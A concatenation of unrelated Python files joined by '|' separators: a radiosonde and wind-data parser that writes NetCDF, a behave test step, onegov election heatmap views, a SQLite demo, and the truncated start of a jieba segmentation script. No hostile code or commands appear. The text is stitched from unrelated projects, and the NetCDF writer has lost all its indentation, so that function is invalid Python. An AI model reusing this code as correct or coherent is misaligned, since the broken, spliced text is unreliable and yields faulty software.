logger.addHandler(handler)
logger.setLevel(logging.INFO)
UTC = pytz.timezone('UTC')
# Regular expressions for the parser
# Matches e.g. "12345 SOME SITE pilot for 27-Mar-1995 00:00Z".
PILOT_REGEX = '^([0-9]+)\s*([a-z0-9\s]+)\s+pilot\s+for\s+(.*)$'
PILOT_PATTERN = re.compile(PILOT_REGEX, flags=re.IGNORECASE)
STARTED_AT_REGEX = '^started\s*at\s*(.*)$'
# Settings for the parsers
DEFAULT_INTERVAL_THRESHOLD_HOURS = 4 # hours threshold to match a given time with a time in the day (0 or 12)
DEFAULT_INTERVAL = timedelta(hours=DEFAULT_INTERVAL_THRESHOLD_HOURS)
# http://stackoverflow.com/questions/1265665/python-check-if-a-string-represents-an-int-without-using-try-except
def is_int(s):
    """Return True when *s* can be parsed by int(), else False."""
    try:
        int(s)
    except ValueError:
        return False
    return True
def parse_wind_file(wind_file):
    """
    Parse a file containing readings with historical wind speed and wind direction. A poor
    man's simple state machine, with just two states.

    Returns a dict keyed by launch datetime; each entry holds station info
    plus 'press_readings' (keyed by hPa-as-float-string) and
    'height_readings' (keyed by height string), both mapping to wind
    direction/speed values (-32768 marks a missing reading).

    NOTE(review): indentation reconstructed from a whitespace-mangled
    source -- confirm branch nesting against the original file.
    """
    dates = dict()
    with open(wind_file, 'r') as wf:
        in_pilot = False
        d = None
        for line in wf:
            m = PILOT_PATTERN.match(line)
            if m:
                if in_pilot:
                    logging.error("Ops. Found a PILOT message before finding the values")
                    raise Exception("Ops. Found a PILOT message before finding the values" )
                station_id = m.group(1)
                site_name = m.group(2).strip()
                date = m.group(3) # 27-Mar-1995 00:00Z
                # Strip the trailing 'Z' before parsing.
                d = datetime.strptime(date[:-1], '%d-%b-%Y %H:%M')
                #d = d.replace(tzinfo=UTC)
                dates[d] = {
                    'station_id': station_id,
                    'site_name': site_name,
                    'date': date,
                    'press_readings': dict(),
                    'height_readings': dict()
                }
                in_pilot = True
            elif in_pilot:
                # Data rows have exactly 4 '|' separators and no 'hPa' header text.
                if line.count('|') == 4 and line.count('hPa') == 0:
                    columns = line.split('|')
                    # Column 0: standard pressure levels ('/' marks missing values).
                    std_levels_col = columns[0].replace('/', ' ').split()
                    if len(std_levels_col) > 0:
                        hpa = std_levels_col[0]
                        if is_int(hpa):
                            hpa = str(float(hpa)) # to match the key in the dict... due to different units in the two files
                            if not hpa in dates[d]['press_readings']:
                                dates[d]['press_readings'][hpa] = dict()
                            if len(std_levels_col) == 3:
                                dates[d]['press_readings'][hpa]['std_wdir'] = std_levels_col[1]
                                dates[d]['press_readings'][hpa]['std_wspeed'] = std_levels_col[2]
                            else:
                                dates[d]['press_readings'][hpa]['std_wdir'] = -32768
                                dates[d]['press_readings'][hpa]['std_wspeed'] = -32768
                    # Columns 1-3: significant levels keyed by height.
                    for x in range(1, 4):
                        sig_levels_col = columns[x].replace('/', ' ').split()
                        if len(sig_levels_col) > 0:
                            height = sig_levels_col[0]
                            if is_int(height):
                                if not height in dates[d]['height_readings']:
                                    dates[d]['height_readings'][height] = dict()
                                if len(sig_levels_col) == 3:
                                    dates[d]['height_readings'][height]['sig_wdir'] = sig_levels_col[1]
                                    dates[d]['height_readings'][height]['sig_wspeed'] = sig_levels_col[2]
                                else:
                                    dates[d]['height_readings'][height]['sig_wdir'] = -32768
                                    dates[d]['height_readings'][height]['sig_wspeed'] = -32768
                elif line.strip().startswith('Message Numbers'):
                    # Trailer line: end of the current PILOT record.
                    in_pilot = False
    return dates
# Had to implement a bit-more-complex state machine or multiple regex'es would be just too slow
class TxtFile(object):
    """Holds the data parsed from one Vaisala sounding text file."""
    def __init__(self):
        self.started_at = ''   # replaced with a datetime by StartedAtState
        self.station = 0
        self.longitude = 0.0
        self.latitude = 0.0
        self.altitude = 0
        self.sounding_type = ''
        self.rs_number = ''
        self.serial_number = ''
        self.clouds = ''
        self.burst_height = 0
        self.significant_levels = dict()        # secs-from-launch -> SignificantLevel
        self.standard_pressure_levels = dict()  # secs-from-launch -> StandardPressureLevel
    def __repr__(self):
        # NOTE(review): assumes parsing already replaced started_at with a
        # datetime; repr() on a fresh instance raises AttributeError.
        return """Vaisala Text Data:
StartedAt [""" + self.started_at.strftime("%Y-%m-%d %H:%M") + """]
Station [""" + str(self.station) + """]
Latitude [""" + str(self.latitude) + """]
Longitude [""" + str(self.longitude) + """]
Altitude [""" + str(self.altitude) + """]
Sig Levels [""" + pformat(self.significant_levels, indent=4) + """]
S P Levels [""" + pformat(self.standard_pressure_levels, indent=4) + """]"""
class SimpleParser(object):
    """Drives the per-line state machine over a Vaisala txt file, then
    merges ("tallies") wind readings into the parsed pressure levels.

    NOTE(review): indentation reconstructed from a whitespace-mangled
    source -- confirm nesting against the original file.
    """
    def __init__(self, wind_data):
        self.data = None            # TxtFile, populated by parse()
        self.current_state = None   # current State object, or None when done
        self.wind_data = wind_data  # dict from parse_wind_file()
    def get_data(self):
        """Return the TxtFile produced by the last parse() call."""
        return self.data
    def parse(self, txt_file):
        """Parse *txt_file* line by line, then tally wind data if any
        standard pressure levels were found."""
        self.data = TxtFile()
        self.current_state = StartedAtState(self.data)
        with open(txt_file, 'r') as wf:
            for line in wf:
                self.parse_line(line)
        if len(self.data.standard_pressure_levels) > 0:
            self._tally()
    def parse_line(self, line):
        # A non-None value() result signals a state transition.
        if self.current_state != None and self.current_state.value(line) != None:
            self.current_state = self.current_state.next()
    def _tally(self):
        """Tally results, by matching an entry in the wind data and getting wspeed and wdir"""
        needle = self.data.started_at
        haystack = self.wind_data
        for date in haystack:
            # Accept wind records within DEFAULT_INTERVAL of the launch time.
            if abs(date - needle) <= DEFAULT_INTERVAL:
                wind_data = self.wind_data[date]
                # Match standard pressure readings
                for press, dic in wind_data['press_readings'].items():
                    if press in self._get_standard_pressure_levels2():
                        standard_pressure_level = self._get_standard_pressure_levels2()[press]
                        standard_pressure_level.speed = int(dic['std_wspeed'])
                        standard_pressure_level.direction = int(dic['std_wdir'])
                # FIXME: Match significant level readings
                # for height, dic in wind_data['height_readings'].items():
                #     if height in self._get_significant_levels2():
                #         standard_pressure_level = self._get_significant_levels2()[press]
                #         standard_pressure_level.speed = int(dic['std_wspeed'])
                #         standard_pressure_level.direction = int(dic['std_wdir'])
                # pprint(wind_data)
                # pprint(self._get_significant_levels2())
                # sys.exit(1)
    def _get_standard_pressure_levels2(self):
        """Return the same dict, but where keys are pressure levels instead of secs. This way we reduce
        the number of loops per pressure reading in the wind_data"""
        d = dict()
        for sec, standard_pressure_level in self.data.standard_pressure_levels.items():
            d[standard_pressure_level.press] = standard_pressure_level
        return d
    def _get_significant_levels2(self):
        """Return the same dict, but where keys are heights levels instead of secs. This way we reduce
        the number of loops per pressure reading in the wind_data"""
        # NOTE(review): re-keying is unimplemented; the secs-keyed dict is
        # returned unchanged.
        d = dict()
        for sec, significant_level in self.data.significant_levels.items():
            pass
            #d[standard_pressure_level.press] = standard_pressure_level
        return self.data.significant_levels
class State(object):
    """Base class for parser states: holds the TxtFile being filled and the
    state to transition to when value() reports a match."""

    def __init__(self, txt_file):
        self.next_state = None
        self.txt_file = txt_file

    def calc_secs(self, mins, secs):
        """Convert a minutes/seconds pair into total seconds."""
        return mins * 60 + secs

    def next(self):
        """Return the state to transition to after a match."""
        return self.next_state

    def value(self, line):
        """Base implementation: never matches."""
        return None
class StartedAtState(State):
    """Finds the 'Started at' line and parses the launch datetime."""
    def __init__(self, txt_file):
        super().__init__(txt_file)
        self.next_state = StationState(txt_file)
    def value(self, line):
        s = None
        try:
            idx = line.index('Started at') + len('Started at')
            if idx >= 0:
                length = len(line)
                s = line[idx:length]
                s = s.strip()
                # dates will be like: 25 March 94 10:51 GMT
                idx2 = s.index(':')
                if idx2 > 0:
                    # Truncate just past the minutes (drops ' GMT').
                    s = s[0:idx2+3]
                try:
                    self.txt_file.started_at = datetime.strptime(s, "%d %B %y %H:%M")
                except ValueError:
                    # Fall back to a four-digit year.
                    self.txt_file.started_at = datetime.strptime(s, "%d %B %Y %H:%M")
        except ValueError:
            # 'Started at' not on this line (index() raised) -- no match.
            pass
        return s
class StationState(State):
    """Finds the 'Station' line and parses the station number."""
    def __init__(self, txt_file):
        super().__init__(txt_file)
        self.next_state = LocationState(txt_file)
    def value(self, line):
        s = None
        try:
            idx = line.index('Station') + len('Station')
            if idx >= 0:
                length = len(line)
                s = line[idx:length]
                s = s.replace(':', '')
                s = s.strip()
                self.txt_file.station = int(s)
        except ValueError:
            # 'Station' not on this line, or int() failed -- no match.
            pass
        return s
class LocationState(State):
    """Parses the 'Location' line: latitude, N/S, longitude, E/W, altitude.

    The line is consumed word-by-word with manual character scans; idx2
    starts at 1 so the slice also skips the separating space.
    """
    def __init__(self, txt_file):
        super().__init__(txt_file)
        self.next_state = SignificantLevelsState1(txt_file)
    def value(self, line):
        s = None
        try:
            idx = line.index('Location') + len('Location')
            if idx >= 0:
                length = len(line)
                s = line[idx:length]
                s = s.replace(':', '')
                s = s.strip()
                # First word: latitude magnitude.
                latitude = ''
                idx2 = 1
                for c in s:
                    if c == ' ':
                        break
                    latitude += c
                    idx2 += 1
                self.txt_file.latitude = float(latitude)
                s = s[idx2:]
                s = s.strip()
                # Hemisphere letter: 'S' negates the latitude.
                direction = ''
                idx2 = 1
                for c in s:
                    if c == ' ':
                        break
                    direction += c
                    idx2 += 1
                if direction.lower() == 's':
                    self.txt_file.latitude = float(self.txt_file.latitude * -1)
                # ignore other possible values
                s = s[idx2:]
                s = s.strip()
                # Longitude magnitude.
                longitude = ''
                idx2 = 1
                for c in s:
                    if c == ' ':
                        break
                    longitude += c
                    idx2 += 1
                self.txt_file.longitude = float(longitude)
                s = s[idx2:]
                s = s.strip()
                # Hemisphere letter: anything but 'E' negates the longitude.
                direction = ''
                idx2 = 1
                for c in s:
                    if c == ' ':
                        break
                    direction += c
                    idx2 += 1
                if direction.lower() != 'e':
                    self.txt_file.longitude = float(self.txt_file.longitude * -1)
                # ignore other possible values
                s = s[idx2:]
                s = s.strip()
                # Station altitude.
                altitude = ''
                idx2 = 1
                for c in s:
                    if c == ' ':
                        break
                    altitude += c
                    idx2 += 1
                self.txt_file.altitude = float(altitude)
        except ValueError:
            # 'Location' absent or a float() conversion failed -- no match.
            pass
        return s
class SignificantLevel(object):
    """Plain record for one significant-level sounding reading; values are
    stored exactly as supplied by the parser (mostly strings)."""

    def __init__(self, press, altitude, temp, rh, fp, speed, direction):
        self.press = press
        self.altitude = altitude
        self.temp = temp
        self.rh = rh
        self.fp = fp
        self.speed = speed
        self.direction = direction

    def __repr__(self):
        return (
            "SignificantLevel(press={0}, altitude={1}, temp={2}, rh={3}, "
            "fp={4}, speed={5}, direction={6})"
        ).format(self.press, self.altitude, self.temp, self.rh, self.fp,
                 self.speed, self.direction)
class SignificantLevelsState1(State):
    """Scans the 'Significant levels: Temperature/Humidity' section and
    collects SignificantLevel records keyed by seconds from launch.

    Progression: title line -> 'Time...' header -> 'min...' header ->
    data rows. Four blank lines after the title end the section and hand
    over to StandardPressureLevelsState1.

    NOTE(review): indentation reconstructed from a whitespace-mangled
    source -- the blank-line handling in particular (where the returns
    sit) should be confirmed against the original file.
    """
    def __init__(self, txt_file):
        super().__init__(txt_file)
        self.next_state = None
        self.title_found = False
        self.headers1_found = False
        self.headers2_found = False
        self.white_lines = 0
    def reset_states(self):
        # Drop header progress (title_found is deliberately kept).
        self.headers1_found = False
        self.headers2_found = False
    def value(self, line):
        s = None
        self.next_state = None
        if line.strip() == '' and self.title_found == True:
            self.white_lines += 1
            if self.white_lines == 4:
                # Section over: transition to the standard-pressure parser.
                self.next_state = StandardPressureLevelsState1(self.txt_file)
                return True
        elif line.strip() == '':
            return
        if self.headers2_found:
            if line.strip()[0].lower() != 's':
                values = line.split()
                if len(values) >= 7:
                    minutes = int(values[0])
                    seconds = int(values[1])
                    press = values[2]
                    height = values[3]
                    temp = values[4]
                    rh = values[5]
                    fp = values[6]
                    secs = self.calc_secs(minutes, seconds)
                    if secs not in self.txt_file.significant_levels:
                        self.txt_file.significant_levels[secs] = SignificantLevel(press=press, altitude=height, temp=temp, rh=rh, fp=fp, speed='', direction='')
                    # FIXME: add to element
                    #pprint(minutes)
                self.next_state = self
            else:
                # Line starting with 's' ends the data rows.
                self.reset_states()
        elif self.headers1_found:
            s = line.strip()
            if len(s) > 3 and s[0:3].lower() == 'min':
                self.reset_states()
                self.headers2_found = True
                self.next_state = self
            else:
                s = None
        elif self.title_found:
            s = line.strip()
            if len(s) > 3 and s[0:4].lower() == 'time':
                self.reset_states()
                self.headers1_found = True
                self.next_state = self
            else:
                s = None
        else:
            try:
                idx = line.index('Significant levels: Temperature/Humidity') + len('Significant levels: Temperature/Humidity')
                if idx >= 0:
                    self.reset_states()
                    self.title_found = True
                    self.white_lines = 0
                    self.next_state = self
            except ValueError:
                s = None
        return s
class StandardPressureLevel(object):
    """Plain record for one standard-pressure-level reading; values are
    stored exactly as supplied by the parser (mostly strings)."""

    def __init__(self, press, altitude, temp, rh, fp, ascrate, speed, direction):
        self.press = press
        self.altitude = altitude
        self.temp = temp
        self.rh = rh
        self.fp = fp
        self.ascrate = ascrate
        self.speed = speed
        self.direction = direction

    def __repr__(self):
        return (
            "StandardPressureLevel(press={0}, altitude={1}, temp={2}, rh={3}, "
            "fp={4}, ascrate={5}, speed={6}, direction={7})"
        ).format(self.press, self.altitude, self.temp, self.rh, self.fp,
                 self.ascrate, self.speed, self.direction)
class StandardPressureLevelsState1(State):
    """Scans the 'Standard pressure levels (PTU)' section and collects
    StandardPressureLevel records keyed by seconds from launch.

    Mirrors SignificantLevelsState1: title -> 'Time...' header ->
    'min...' header -> data rows; there is no further state to hand over
    to (next_state stays None).

    NOTE(review): indentation reconstructed from a whitespace-mangled
    source -- the blank-line handling in particular should be confirmed
    against the original file.
    """
    def __init__(self, txt_file):
        super().__init__(txt_file)
        self.next_state = None
        self.title_found = False
        self.headers1_found = False
        self.headers2_found = False
        self.white_lines = 0
    def reset_states(self):
        # Drop header progress (title_found is deliberately kept).
        self.headers1_found = False
        self.headers2_found = False
    def value(self, line):
        s = None
        self.next_state = None
        if line.strip() == '' and self.title_found == True:
            self.white_lines += 1
            if self.white_lines == 4:
                #self.next_state = StandardPressureLevelsState2()
                self.next_state = None
                return s
        elif line.strip() == '':
            return
        if self.headers2_found:
            if line.strip()[0].lower() != 's':
                values = line.split()
                if len(values) >= 8:
                    try:
                        minutes = int(values[0])
                        seconds = int(values[1])
                    except ValueError:
                        # Row without a numeric time prefix -- skip it.
                        return
                    press = values[2]
                    height = values[3]
                    temp = values[4]
                    rh = values[5]
                    fp = values[6]
                    ascrate = values[7]
                    secs = self.calc_secs(minutes, seconds)
                    if secs not in self.txt_file.standard_pressure_levels:
                        self.txt_file.standard_pressure_levels[secs] = StandardPressureLevel(press=press, altitude=height, temp=temp, rh=rh, fp=fp, ascrate=ascrate, speed='', direction='')
                    # FIXME: add to element
                    #pprint(minutes)
                self.next_state = self
            else:
                # Line starting with 's' ends the data rows.
                self.reset_states()
        elif self.headers1_found:
            s = line.strip()
            if len(s) > 3 and s[0:3].lower() == 'min':
                self.reset_states()
                self.headers2_found = True
                self.next_state = self
            else:
                s = None
        elif self.title_found:
            s = line.strip()
            if len(s) > 3 and s[0:4].lower() == 'time':
                self.reset_states()
                self.headers1_found = True
                self.next_state = self
            else:
                s = None
        else:
            try:
                idx = line.index('Standard pressure levels (PTU)') + len('Standard pressure levels (PTU)')
                if idx >= 0:
                    self.reset_states()
                    self.title_found = True
                    self.white_lines = 0
                    self.next_state = self
            except ValueError:
                s = None
        return s
def parse_txt_file(txt_file, wind_data):
    """
    Parse the Vaisala txt file, returning a mixed dict.
    """
    simple_parser = SimpleParser(wind_data)
    simple_parser.parse(txt_file)
    return simple_parser.get_data()
def write_netcdf_file(data, output_file):
"""Writes the resulting data to a NetCDF file"""
dataset = Dataset(output_file, "w", format="NETCDF4_CLASSIC")
# Dimensions
dataset.createDimension("time")
dataset.setncattr('g.General.SiteWmoId', '93' + str(data.station))
dataset.setncattr('g.MeasuringSystem.Longitude', str(data.longitude) + ' degree east')
dataset.setncattr('g.MeasuringSystem.Latitude', str(data.latitude) + ' degree north')
dataset.setncattr('g.MeasuringSystem.Altitude', str(data.altitude) + ' m')
#dataset.setncattr('g.SurfaceObs.Pressure', str(ident['surface_pressure']) + ' hPa')
#dataset.setncattr('g.SurfaceObs.Temperature', str(ident['surface_temperature']) + ' °C')
#dataset.setncattr('g.SurfaceObs.RelativeHumidity', str(ident['surface_humidity']) + ' %')
dataset.setncattr('g.General.SiteCode', "INVRCRGL")
dataset.setncattr('g.General.SiteName', "Invercargill")
dataset.setncattr('g.General.SiteInstitution', "MetService New Zealand")
dataset.setncattr('g.Product.Producer', "National Institute of Water and Atmospheric Research (New Zealand)")
dataset.setncattr('g.Product.References', "https://github.com/kinow/pccora")
#dataset.station_type = ident['station_type']
#dataset.region_number = ident['region_number']
#dataset.wmo_block_number = ident['wmo_block_number']
dataset.wmo_block_number = 93
dataset.wmo_station_number = data.station
#dataset.wind_speed_unit = str(ident['wind_speed_unit']) + ', comment: 0 = m/s 1 = knots'
#dataset.telecommunications_headings = str(ident['telecommunications_headings']) + ', comment: 0 = No 1 = Yes'
#dataset.res = ident['reserved']
#dataset.sounding_type = str(ident['sounding_type']) + ', comment: 0 = PTU 1 = Only pressure 2 = No PTU (Radar'
#dataset.start_mode = str(ident['start_mode']) + ', comment: 0 = Auto 1 = Manual'
#dataset.time_elapsed = ident['time_elapsed']
#dataset.ptu_rate = ident['ptu_rate']
#dataset.spu_serial_number = ident['spu_serial_number']
#dataset.year = ident['year']
#dataset.month = ident['month']
#dataset.day = ident['day']
#dataset.julian_date = ident['julian_date']
#dataset.hour = ident['hour']
#dataset.minute = ident['minute']
#dataset.message_year = ident['message_year']
#dataset.message_month = ident['message_month']
#dataset.message_day = ident['message_day']
#dataset.message_hour = ident['message_hour']
#dataset.cloud_group = ident['cloud_group']
#dataset.weather_group = ident['weather_group']
#dataset.napp = ident['napp']
#dataset.humidity_correction = ident['humidity_correction']
#dataset.success_of_signal = ident['success_of_signal']
#dataset.pressure_accept_level = ident['pressure_accept_level']
#dataset.pressure_replace_level = ident['pressure_replace_level']
#dataset.pressure_reject_level = ident['pressure_reject_level']
#dataset.temperature_accept_level = ident['temperature_accept_level']
#dataset.temperature_replace_level = ident['temperature_replace_level']
#dataset.temperature_reject_level = ident['temperature_reject_level']
#dataset.humidity_accept_level = ident['humidity_accept_level']
#dataset.humidity_replace_level = ident['humidity_replace_level']
#dataset.humidity_reject_level = ident['humidity_reject_level']
#dataset.total_omega_count = ident['total_omega_count']
#dataset.reason_temination = ident['reason_temination']
#dataset.omega_count = ident['omega_count']
#dataset.wind_computing_mode = str(ident['wind_computing_mode']) + ', comment: 0 = Remote 1 = Local 2 = Differential'
#dataset.wind_mode = str(ident['wind_mode']) + ', comment: 0 = Omega 1 = Loran-C 2 = Radar 255 = Only PTU'
#dataset.stations_used = str(ident['stations_used']) + ', comment: One bit for each station 1 = Used 0 = Not used'
#dataset.loranc_chains_used = ident['loranc_chains_used']
#dataset.gri_chain_1 = ident['gri_chain_1']
#dataset.gri_chain_2 = ident['gri_chain_2']
#dataset.exclude_loran_transmitters = str(ident['exclude_loran_transmitters']) + ', comment: One bit for each in the chain; and chain 2 transmitted'
#dataset.phase_integration_time = str(ident['phase_integration_time']) + ', comment: 0 = time (s) 1 = Altitude (m/MSI'
#dataset.phase_integration_time_1 = ident['phase_integration_time_1']
#dataset.phase_integration_time_2 = ident['phase_integration_time_2']
#dataset.phase_integration_time_3 = ident['phase_integration_time_3']
#dataset.phase_integration_time_4 = ident['phase_integration_time_4']
#dataset.phase_integration_time_5 = ident['phase_integration_time_5']
#dataset.phase_integration_time_6 = ident['phase_integration_time_6']
#dataset.phase_integration_change_level_1 = ident['phase_integration_change_level_1']
#dataset.phase_integration_change_level_2 = ident['phase_integration_change_level_2']
#dataset.phase_integration_change_level_3 = ident['phase_integration_change_level_3']
#dataset.phase_integration_change_level_4 = ident['phase_integration_change_level_4']
#dataset.phase_integration_change_level_5 = ident['phase_integration_change_level_5']
#dataset.phase_integration_change_level_6 = ident['phase_integration_change_level_6']
#dataset.reference_pressure = str(ident['reference_pressure']) + ' hPa'
#dataset.reference_temperature = str(ident['reference_temperature']) + ' °C'
#dataset.reference_humidity = str(ident['reference_humidity']) + ' %'
dataset.institution = "MetService New Zealand"
dataset.datetime = str(data.started_at)
dataset.comment = 'For more information about the variables see: https://badc.nerc.ac.uk/data/ukmo-rad-hires/pc-coradata.html'
elapsed_time = []
#logarithmic_pressure = []
temperature = []
relative_humidity = []
#north_wind = []
#east_wind = []
altitude = []
pressure = []
dew_point = []
#mixing_ratio = []
wind_direction = []
wind_speed = []
#azimuth_angle = []
#horizontal_distance = []
#longitude = []
#latitude = []
#significance_key = []
#recalculated_significance_key = []
#radar_height = []
ascrate = []
for secs, standard_pressure_level in data.standard_pressure_levels.items():
elapsed_time.append(secs)
temperature.append(standard_pressure_level.temp)
relative_humidity.append(standard_pressure_level.rh)
altitude.append(standard_pressure_level.altitude)
pressure.append(standard_pressure_level.press)
dew_point.append(standard_pressure_level.fp)
wind_direction.append(standard_pressure_level.direction)
wind_speed.append(standard_pressure_level.speed)
ascrate.append(standard_pressure_level.ascrate)
# elapsed_time
elapsed_time_variable = dataset.createVariable('elapsed_time', 'f4', ("time", ), zlib=True, fill_value=-32768)
elapsed_time_variable.standard_name = 'elapsed_time'
elapsed_time_variable.units = 's'
elapsed_time_variable.long_name = 'Elapsed time since sonde release'
elapsed_time_variable.g_format_type = 'FLT'
elapsed_time_variable[:] = elapsed_time
# temperature
temperature_variable = dataset.createVariable('temp', 'f4', ("time", ), zlib=True, fill_value=-32768)
temperature_variable.standard_name = 'air_temperature'
temperature_variable.units = 'C'
temperature_variable.long_name = 'Temperature'
temperature_variable.g_format_type = 'FLT'
temperature_variable.coordinates = "lon lat alt"
temperature_variable[:] = temperature
# relative_humidity
relative_humidity_variable = dataset.createVariable('rh', 'f4', ("time", ), zlib=True, fill_value=-32768)
relative_humidity_variable.standard_name = 'relative_humidity'
relative_humidity_variable.units = '%'
relative_humidity_variable.long_name = 'Relative Humidity'
relative_humidity_variable.g_format_type = 'FLT'
relative_humidity_variable.coordinates = "lon lat alt"
relative_humidity_variable[:] = relative_humidity
# altitude
altitude_variable = dataset.createVariable('alt', 'f4', ("time", ), zlib=True, fill_value=-32768)
altitude_variable.standard_name = 'altitude'
altitude_variable.units = 'gpm'
altitude_variable.long_name = 'Altitude'
altitude_variable.g_format_type = 'FLT'
altitude_variable.positive = "up"
altitude_variable[:] = altitude
# pressure
pressure_variable = dataset.createVariable('press', 'f4', ("time", ), zlib=True, fill_value=-32768)
pressure_variable.standard_name = 'air_pressure'
pressure_variable.units = 'hPa'
pressure_variable.long_name = 'Pressure'
pressure_variable.g_format_type = 'FLT'
pressure_variable.coordinates = "lon lat alt"
pressure_variable[:] = pressure
# dew_point
dew_point_variable = dataset.createVariable('FP', 'f4', ("time", ), zlib=True, fill_value=-32768)
dew_point_variable.units = 'C'
dew_point_variable.long_name = 'Frostpoint'
dew_point_variable.g_format_type = 'FLT'
dew_point_variable.coordinates = "lon lat alt"
dew_point_variable[:] = dew_point
# wind_direction
wind_direction_variable = dataset.createVariable('wdir', 'f4', ("time", ), zlib=True, fill_value=-32768)
wind_direction_variable.standard_name = 'wind_from_direction'
wind_direction_variable.units = 'degree'
wind_direction_variable.long_name = 'Wind Direction'
wind_direction_variable.g_format_type = 'FLT'
wind_direction_variable.coordinates = "lon lat alt"
wind_direction_variable.comment = "Wind direction"
wind_direction_variable[:] = wind_direction
# wind_speed
wind_speed_variable = dataset.createVariable('wspeed', 'f4', ("time", ), zlib=True, fill_value=-32768)
wind_speed_variable.standard_name = 'wind_speed'
wind_speed_variable.units = 'm s-1'
wind_speed_variable.long_name = 'Wind Speed'
wind_speed_variable.g_format_type = 'FLT'
wind_speed_variable.coordinates = "lon lat alt"
wind_speed_variable.comment = "Wind speed"
wind_speed_variable[:] = wind_speed
# ascrate
ascrate_variable = dataset.createVariable('ascrate', 'f4', ("time", ), zlib=True, fill_value=-32768)
ascrate_variable.standard_name = 'ascrate'
ascrate_variable.units = 'm/s'
ascrate_variable.long_name = 'Ascension rate'
ascrate_variable.g_format_type = 'FLT'
ascrate_variable[:] = ascrate
dataset.close()
def main(wind_file='/home/kinow/Downloads/Inv_upper_air_wind_MetService_simple2.txt',
         txt_file='/home/kinow/Downloads/99100110.TXT',
         output_file='/home/kinow/Downloads/99100110-with-wind-data.nc'):
    """
    Parse the wind and sounding TXT files and write the combined NetCDF file.

    The previously hard-coded paths are now keyword parameters (with the old
    values as defaults), so the pipeline can be reused for other files while
    remaining backward compatible with ``main()``.

    :param wind_file: path to the upper-air wind text file
    :param txt_file: path to the sounding TXT file
    :param output_file: path of the NetCDF file to create
    """
    logger.info('Parsing WIND file')
    dates = parse_wind_file(wind_file)
    logger.info('Done')
    logger.info('Parsing TXT file')
    data = parse_txt_file(txt_file, dates)
    logger.info('Done')
    logger.info('Writing NetCDF file')
    write_netcdf_file(data, output_file)


if __name__ == '__main__':
    main()
|
from datetime import datetime
from behave import given, then
from behave.runner import Context
from freezegun import freeze_time
from pepy.domain.model import ProjectName, ProjectDownloads, Downloads
from tests.tools.stub import ProjectStub
@given("today is {date}")
def step_impl(context: Context, date: str):
    # Freeze the wall clock at `date` for the rest of the scenario.
    # NOTE(review): the freezer is started but never stopped here — presumably
    # an after-scenario hook stops it; confirm, otherwise time stays frozen
    # across scenarios.
    freezer = freeze_time(date)
    freezer.start()
|
from onegov.ballot import Election
from onegov.ballot import List
from onegov.core.security import Public
from onegov.election_day import ElectionDayApp
from onegov.election_day.layouts import ElectionLayout
from onegov.election_day.utils import add_last_modified_header
from sqlalchemy import func
def list_options(request, election):
    """Return (url, label) choices for the election's lists.

    Majorz elections have no lists, so an empty list is returned. Labels
    include the mandate count only for completed elections.
    """
    if election.type == 'majorz':
        return []

    mandates = request.translate(request.app.principal.label('mandates'))

    ordered = election.lists.order_by(None).order_by(
        List.number_of_mandates.desc(),
        func.lower(List.name)
    )

    options = []
    for item in ordered:
        suffix = ''
        if item.number_of_mandates and election.completed:
            suffix = f'({item.number_of_mandates} {mandates})'
        label = '{} {}'.format(item.name, suffix).strip()
        options.append((request.link(item, name='by-district'), label))
    return options
@ElectionDayApp.json(
    model=List,
    name='by-district',
    permission=Public
)
def view_list_by_district(self, request):
    """ View the list by district as JSON. """
    # Delegates entirely to the model's precomputed per-district percentages.
    return self.percentage_by_district
@ElectionDayApp.html(
    model=Election,
    name='list-by-district',
    template='election/heatmap.pt',
    permission=Public
)
def view_election_list_by_district(self, request):
    """ View the list as heatmap by district. """
    layout = ElectionLayout(self, request, 'list-by-district')
    options = list_options(request, self)
    # The first list's JSON endpoint drives the initial map rendering.
    data_url = options[0][0] if options else None
    return {
        'election': self,
        'layout': layout,
        'options': options,
        'map_type': 'districts',
        'data_url': data_url,
        'embed_source': request.link(
            self,
            name='list-by-district-chart',
            query_params={'locale': request.locale}
        )
    }
@ElectionDayApp.html(
    model=Election,
    name='list-by-district-chart',
    template='embed.pt',
    permission=Public
)
def view_election_list_by_district_chart(self, request):
    """ Embed the heatmap. """

    @request.after
    def add_last_modified(response):
        # Allow downstream caches to validate against the election's mtime.
        add_last_modified_header(response, self.last_modified)

    options = list_options(request, self)
    data_url = options[0][0] if options else None
    return {
        'model': self,
        'layout': ElectionLayout(self, request),
        'type': 'map',
        'scope': 'districts',
        'year': self.date.year,
        'thumbs': 'false',
        'color_scale': 'r',
        'label_left_hand': '0%',
        'label_right_hand': '100%',
        'data_url': data_url,
        'options': options
    }
|
# -*- coding: utf-8 -*-
"""
Name: SQLite example of creating tables and inserting rows.
Author: Martin Bo Kristensen Grønholdt.
Version: 1.0 (2017-04-22)
"""
# Import the SQLite module
import sqlite3
# Start an exception block to catch errors.
try:
    # Create a connection to a database with the file name 'example.db'.
    # The file is created if missing.
    conn = sqlite3.connect('example.db')
    # Get a Cursor object used to perform SQL commands on the database.
    cursor = conn.cursor()

    # Create the customerTable table. (Running this script twice raises an
    # sqlite3.Error here because the table already exists — caught below.)
    print('Creating customerTable...', end='')
    cursor.execute(
        """
        CREATE TABLE customerTable(
        idCust INT NOT NULL UNIQUE,
        name VARCHAR(100),
        email VARCHAR(50),
        address VARCHAR(50),
        city VARCHAR(30),
        PRIMARY KEY (idCust)
        )
        """
    )

    # Insert the data with a single parameterized executemany instead of
    # three string-literal INSERT statements.
    customers = [
        (1, 'Per', 'pda@eal.dk', 'Mystreet1', 'Odense'),
        (2, 'Artur', 'at@hotmail.com', 'Allstreet 741', 'Vilnius'),
        (3, 'Alice', 'ab@gmail.com', 'Topstreet 56', 'London'),
    ]
    cursor.executemany(
        'INSERT INTO customerTable VALUES (?, ?, ?, ?, ?)',
        customers
    )

    # Commit the data to the database.
    conn.commit()
    print('done')

    print('\nCurrent entries in the database:')
    # Select and print all rows, numbering them from 1.
    cursor.execute('SELECT * FROM customerTable')
    for row_nr, row in enumerate(cursor.fetchall(), start=1):
        print('Row {}: '.format(row_nr), end='')
        # Print every field of the row on the same line.
        for field in row:
            print('{}, '.format(field), end='')
        print()
except sqlite3.Error as sql_error:
    print('\n\nAn database error occurred!')
    print('Error is: ' + str(sql_error))
|
# -*- coding: utf-8 -*-
# jieba_wikiData.py将wiki数据用jieba进行分词,生成wiki.zh.text.seg文件
import jieba
# jieba.load_userdict('userdict.txt')
# 创建停用词list
def stop_words_list(filepath):
    """Read a stopword file (one word per line, UTF-8) into a list.

    :param filepath: path to the stopword file
    :return: list of stripped stopword strings, in file order
    """
